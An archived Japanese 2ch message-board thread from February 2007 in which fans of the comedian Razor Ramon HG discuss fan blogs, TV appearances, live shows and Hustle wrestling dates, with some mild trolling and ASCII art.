181 :名無しさん@板分割議論中:2007/02/19(月) 12:33:10
まともな人ほど2chではキモいと言われる法則発動中でつかw
ブロガー何人か知ってるけど良い人ばっかりだよ。

182 :名無しさん@板分割議論中:2007/02/19(月) 12:37:03
>>180
「捏造」のやりとり見たかったw

183 :名無しさん@板分割議論中:2007/02/19(月) 12:49:05
まあ、ブロガーも175みたいなキモねらーにキモいとか言われたくないだろうよ

184 :名無しさん@板分割議論中:2007/02/19(月) 12:53:20
好きだもん!レイザーラモンHGw
さすがにこれはキモいだろ。
まあ、ブロガーは全員女みたいだしミーハーっぽいのは仕方ないけど。

185 :名無しさん@板分割議論中:2007/02/19(月) 13:01:05
>>184
え、そう?自分そのブログが一番まともだと思うけどw

186 :名無しさん@板分割議論中:2007/02/19(月) 13:03:56
仲間割れっすかww

187 :名無しさん@板分割議論中:2007/02/19(月) 13:06:05
>>186
別に割れてないよw。談笑してんじゃんw

188 :名無しさん@板分割議論中:2007/02/19(月) 13:06:07
>>181
凄く有難いブロガーもいれば
性格の良し悪し以前の問題で人格を疑うヤツもいた。

>>185
自分も。そこの主が一番有難い。

189 :名無しさん@板分割議論中:2007/02/19(月) 13:07:24
>>188
ゆか坊さんのところ情報量多いし、大人だしね。

190 :名無しさん@板分割議論中:2007/02/19(月) 13:10:42
ブロガーの間でも嫁の評判はよくないみたいだね。
惚気はやめてって書いてる人もいた。





191 :名無しさん@板分割議論中:2007/02/19(月) 13:19:44
>>189
大人だからレポも信頼できるしマイナスな事でも不快にならない。
反対に2ch丸出しで愚痴っている(190に挙げられている人)は恥ずかしいYO

192 :名無しさん@板分割議論中:2007/02/19(月) 13:43:21
ブログの批評や感想はそれぞれのBBSなりでどうぞ。板違いだし、興味ナス。

193 :名無しさん@板分割議論中:2007/02/19(月) 14:05:14
HGにまだそんなにたくさんブロガーがついてるのが
驚きだわ

194 :名無しさん@板分割議論中:2007/02/19(月) 14:09:03
別に190は特定のブログを晒してるわけじゃないだろ。
どのブログを嫌いなのかは知らないけど、2chぽくて愚痴ってるブログなんて
あったっけ?2ch嫌いなブログは知ってるけどw
もしかして某HGブログに変なトラックバック繰り返してたっていう人か?

195 :名無しさん@板分割議論中:2007/02/19(月) 14:11:13
194>>191

196 :名無しさん@板分割議論中:2007/02/19(月) 14:13:53
宣伝ウザス

197 :名無しさん@板分割議論中:2007/02/19(月) 14:42:21
いただきマッスルはすごいハードだったな。でも楽しかった。
>>155ミヤギテレビの良い仕事ぶりになごんだ。
しかし本家公式サイトには特にリンク貼ってないとか、妙な作りだw

198 :名無しさん@板分割議論中:2007/02/19(月) 21:48:15
ラジかる上向きになってきてるようだね

199 :名無しさん:2007/02/20(火) 00:41:25
3/10 渋谷ストリートライブ解放区

200 :名無しさん:2007/02/20(火) 11:35:52
>>197
FCTの解説もスゴイよ

201 :名無しさん:2007/02/20(火) 12:00:05
番宣CM見たが、
これに出るかも

2/20(火) 19:00〜20:54 フジテレビ 爆笑ものまね

202 :名無しさん:2007/02/20(火) 13:03:48
>>201
うーん、あのちょっと痛いそっくりさんだけじゃないかなあとも予想
過去のフィルムでチラっと程度とか…

203 :名無しさん:2007/02/20(火) 13:03:56
>>201
CMに出てたのか?
HPみても出演者が載ってないからわからん

204 :名無しさん:2007/02/20(火) 15:59:22
パセラの?

205 :名無しさん:2007/02/20(火) 18:03:29
           , -+--、
          」_─‐、:i'
    、'~ィ     (_,ノI'、_):ァ  bk´ 〉
   i;;;i     . !rヮj ,ィ    〉;;i  出ますよ〜
   ヽ `ー-‐'⌒::::`ル:::::::r~`( /   
    `‐- ─ヘ:::::::|::::::::::ヾ、__,ノ
         〉::::|::::::::::/
         /;;;;/;;;;;;;/
    ((   /;;;/:::::::《   ))
        <;;;l《:::::;;:ヽ
      /   ヽI,r''"^~、
    /   ,/ ヽ    、
    (  r'     ヽ  〉
    `、 ヽ     / /
     ヽ__l   / /
   __,,ノ:::;::〉  ト、:::`ー'〉
   ` - ‐'`      ` ‐ '


206 :名無しさん:2007/02/20(火) 23:24:07
出なかった?

207 :名無しさん:2007/02/20(火) 23:26:37
>>206
総集編だったっぽい。

208 :名無しさん:2007/02/20(火) 23:34:23
そうなんだ。サンクスコ。ンダッ

209 :ルミネ:2007/02/21(水) 01:37:58
4/3(火)、4/7(土)RG、4/10(火)、
4/13(金)、4/15(日)RG、4/20(金)

210 :名無しさん:2007/02/21(水) 01:52:54
そっくりさんのブログにも、
今日は総集編って書いてあって。

211 :名無しさん:2007/02/21(水) 11:44:01
相方に対する愛情が最も希薄な薄情芸人。
ゲイ人として、すぐに飽きられるのわからないのか。

212 :名無しさん:2007/02/21(水) 13:30:48
らじカルのEDでキューバの伊達男の告知してたな

213 :名無しさん:2007/02/21(水) 13:41:37
まだHGファンっていたんだ。
HGもうれしいだろうね。

214 :名無しさん:2007/02/21(水) 13:54:06
今年はムーディー勝山がブレークしそう

215 :名無しさん:2007/02/21(水) 14:32:54
>>213
わざわざ嫌味を書いて、構ってもらいに来るヒマな荒らしも居るくらいだからねw

216 :名無しさん:2007/02/21(水) 15:59:45
>>212
言ってたね。新コスはハッスル風だった。
うp神ありがとう。

217 :名無しさん:2007/02/21(水) 19:17:17
ハッスルフー
頂マッスル、めちゃイケうp

218 :名無しさん:2007/02/21(水) 20:29:59
フーさんありがとう!

219 :名無しさん:2007/02/21(水) 21:21:08
ハッスル4月日程発表、21日は大阪で「ハッスル22」

ハッスル事業局は21日、4月日程を発表した。現在のところ、
4月のスケジュールは3月同様にナンバーシリーズとハウス1大会ずつの合計2大会。
4月19日に東京・後楽園ホールで「ハッスル・ハウスvol.23」、
4月21日に大阪・大阪府立体育館で「ハッスル22」が開催される。

■「ハッスル・ハウスvol.23」
4月19日(木)東京・後楽園ホール 開場18:00 開演19:00

■「ハッスル22」
4月21日(土)大阪・大阪府立体育館 開場16:00 開演17:00

220 :名無しさん:2007/02/22(木) 00:47:25
大阪の人いいなあ(´・ω・`)

221 :名無しさん:2007/02/22(木) 01:29:04
今まで平日だったからチト嬉しい。試合あるかわからないけど。

222 :名無しさん:2007/02/22(木) 08:52:51
地元だから、試合に出るんじゃね。

223 :名無しさん:2007/02/22(木) 15:15:08
会社でロケしていると書いてる人がいた
水野キングダムの関係っぽい

224 :名無しさん:2007/02/22(木) 21:09:29
単独ライブのVも撮ったらしいね。
あと1週間か、楽しみだなー。

225 :名無しさん:2007/02/23(金) 15:53:41
HG、RGがシン戦に向け決死のアピール=ハッスル

http://sportsnavi.yahoo.co.jp/fight/pride/headlines/20070223-00000013-spnavi-fight.html

226 :名無しさん:2007/02/23(金) 16:26:43
落ち目芸人頑張れ!

227 :名無しさん:2007/02/23(金) 16:51:19
>>225
おおおーw トンクス
帰ったらハッスル公式に行って確かめないと!

228 :名無しさん:2007/02/23(金) 18:48:20
>>225
こっちのが詳しいよ
ttp://sportsnavi.yahoo.co.jp/fight/other/column/200702/at00012405.html

229 :名無しさん:2007/02/23(金) 18:56:40
>>228
あっホントだ。。サンクス。

42 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)